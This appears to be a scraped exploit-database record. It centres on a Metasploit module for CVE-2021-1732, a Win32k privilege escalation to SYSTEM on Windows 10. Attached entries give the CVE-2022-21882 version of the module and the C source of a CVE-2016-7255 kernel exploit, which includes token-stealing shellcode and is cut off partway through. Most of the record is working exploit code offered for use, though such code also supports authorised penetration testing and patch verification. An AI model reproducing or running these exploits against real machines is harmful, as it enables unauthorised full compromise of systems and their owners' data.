ID PACKETSTORM:161880 Type packetstorm Reporter Spencer McIntyre Modified 2021-03-19T00:00:00
Description
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Win32k ConsoleControl Offset Confusion',
'Description' => %q{
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
},
'License' => MSF_LICENSE,
'Author' => [
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
'KaLendsi', # github poc targeting v1909
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Targets' =>
[
[ 'Windows 10 v1803-20H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' =>
{
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ]
],
'DisclosureDate' => '2021-02-10',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
}
)
)
end
def check
sysinfo_value = sysinfo['OS']
if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")
# see https://docs.microsoft.com/en-us/windows/release-information/
unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19042)
print_error('The exploit only supports Windows 10 versions 1803 - 20H2')
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-1732', 'CVE-2021-1732.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
`
{"metasploit": [{"lastseen": "2022-03-17T17:54:12", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T20:23:38", "type": "metasploit", "title": "Win32k ConsoleControl Offset Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-24T16:24:20", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2022_21882_WIN32K/", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_21882_win32k/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_21882_win32k.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-02-28T16:54:53", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "packetstorm", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166169", "href": "https://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::Deprecated \nmoved_from 'exploit/windows/local/cve_2021_1732_win32k' \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n \nThis flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \nIn early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is \nis the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to \nfunction on a wider range of Windows 10 targets. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n# CVE-2021-1732 \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n# CVE-2022-21882 \n'L4ys', # github poc \n# both CVEs \n'KaLendsi', # github pocs \n# Metasploit exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread' \n}, \n'Targets' => [ \n[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => { \n'DisableNops' => true \n}, \n'References' => [ \n# CVE-2021-1732 references \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], \n# CVE-2022-21882 references \n[ 'CVE', '2022-21882' ], \n[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] \n], \n'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n'SideEffects' => [] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) \nprint_error('The exploit only supports Windows 10 versions 1803 - 21H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166169/cve_2022_21882_win32k.rb.txt"}, {"lastseen": "2017-01-12T02:03:22", "description": "", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Kernel win32k.sys NtSetWindowLongPtr Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140468", "href": "https://packetstormsecurity.com/files/140468/Microsoft-Windows-Kernel-win32k.sys-NtSetWindowLongPtr-Privilege-Escalation.html", "sourceData": "`// ricklarabee.blogspot.com \n \n//This program is free software; you can redistribute it and/or \n//modify it under the terms of the GNU General Public License \n//as published by the Free Software Foundation. \n \n//This program is distributed in the hope that it will be useful, \n//but WITHOUT ANY WARRANTY; without even the implied warranty of \n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the \n//GNU General Public License for more details. \n \n//You should have received a copy of the GNU General Public License \n//along with this program; if not, write to the Free Software \n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. \n \n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255 \n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n#pragma comment(lib, \"advapi32\") \n \nUINT64 PML4_BASE; \nUINT PML4_SELF_REF_INDEX; \nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68; \n \n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) \n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) \n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n \n//////////////////////////////////////////////////////// \n// Define Data Types \n//////////////////////////////////////////////////////// \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; \nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, \nOUT PVOID SystemInformation, \nIN ULONG SystemInformationLength, \nOUT PULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, \nOUT PULONG Interval); \n \nNtQuerySystemInformation_t NtQuerySystemInformation; \nNtQueryIntervalProfile_t NtQueryIntervalProfile; \n \nchar shellcode[] = { \n//0xcc, \n0xfa, // CLI \n0x9c, // PUSHFQ \n0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer \n0x50, // PUSH RAX \n0x51, // PUSH RCX \n0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] \n0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX \n0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID \n0x53, // PUSH RBX \n \n0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 \n0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS \n0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \n//<tag> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 \n0x75, 0xf3, // JNE <tag> \n0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM \n \n0x53, // PUSH RBX \n//<tag2> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x39, 0xcb, // CMP EBX, ECX // our PID \n0x75, 0xf5, // JNE <tag2> \n0x5b, // POP RBX \n0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX \n \n0x5b, // POP RBX \n0x59, // POP RCX \n0x58, // POP RAX \n0x9d, // POPFQ \n \n0xfb, // STI \n0xff, 0xe0 // JMP RAX \n}; \n \nULONG __cdecl DbgPrint(__in char* Format, ...) \n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList = NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR)); \n \nva_start(VaList, Format); \n \n_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList); \n \n \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree(GetProcessHeap(), 0, pszDbgBuff); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \nfor (i = 0; i < nCount; i++) \n{ \n_sim_key_down(VK_TAB); \n_sim_key_up(VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \nint _sim_alt_esc(int count) \n{ \nint i = 0; \n \nfor (i = 0; i<count; i++) \n{ \n_sim_key_down(VK_MENU); \n//_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n//_sim_key_up(VK_SHIFT); \n \n} \n \nreturn 0; \n} \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = { 0 }; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = { 0 }; \n \nUINT64 value = 0; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif (0 == RegisterClassExW(&stWC)) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ((UCHAR*)pAddress - 0x28); \n#else \npId = ((UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId); \n \nDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild); \n \nShowWindow(hWndParent, SW_SHOWNORMAL); \n \nSetParent(hWndChild, GetDesktopWindow()); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild, TRUE); \n \n_sim_alt_shift_esc(); \n \nwhile (GetMessage(&stMsg, NULL, 0, 0)) { \n \nSetFocus(hWndParent); \n_sim_alt_esc(20); \nSetFocus(hWndChild); \n_sim_alt_esc(20); \n \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n \nif (value != 0) { \nbreak; \n} \n \n \n__try { \nvalue = *(UINT64 *)PML4_SELF_REF; \nif ((value & 0x67) == 0x67) { \nprintf(\"Value Self Ref = %llx\\n\", value); \nbreak; \n} \n} \n__except (EXCEPTION_EXECUTE_HANDLER) { \ncontinue; \n} \n \n} \n \n \n} while (FALSE); \n \nif (NULL != hWndParent) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif (NULL != hWndChild) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName, GetModuleHandleW(NULL)); \n \nreturn 0; \n} \n \nUINT64 get_pxe_address(UINT64 address) { \nUINT entry = PML4_SELF_REF_INDEX; \nUINT64 result = address >> 9; \nUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39); \nUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8; \nresult = result | lower_boundary; \nresult = result & upper_boundary; \nreturn result; \n} \n \nUINT64 look_free_entry_pml4(void) { \n// Looks for a free pml4e in the last 0x100 bytes of the PML4 \nint offset = 0xF00; \nUINT64 pml4_search = PML4_BASE + offset; \nwhile (offset < 0xFF8) \n{ \nif ((*(PVOID *)pml4_search) == 0x0) \n{ \n// This is a NULL (free) entry \nbreak; \n} \noffset += 8; \npml4_search = PML4_BASE + offset; \n} \nreturn pml4_search; \n} \n \nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) { \nUINT64 index = (spurious_offset & 0xFFF) / 8; \nUINT64 result = ( \n((UINT64)0xFFFF << 48) | \n((UINT64)PML4_SELF_REF_INDEX << 39) | \n((UINT64)PML4_SELF_REF_INDEX << 30) | \n((UINT64)PML4_SELF_REF_INDEX << 21) | \n(index << 12) \n); \nreturn result; \n} \n \n \n \nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) { \n \n/* \n1: kd> !pte ffffffff`ffd00000 \nVA ffffffffffd00000 \nPXE at FFFFF6FB7DBEDFF8 PPE at 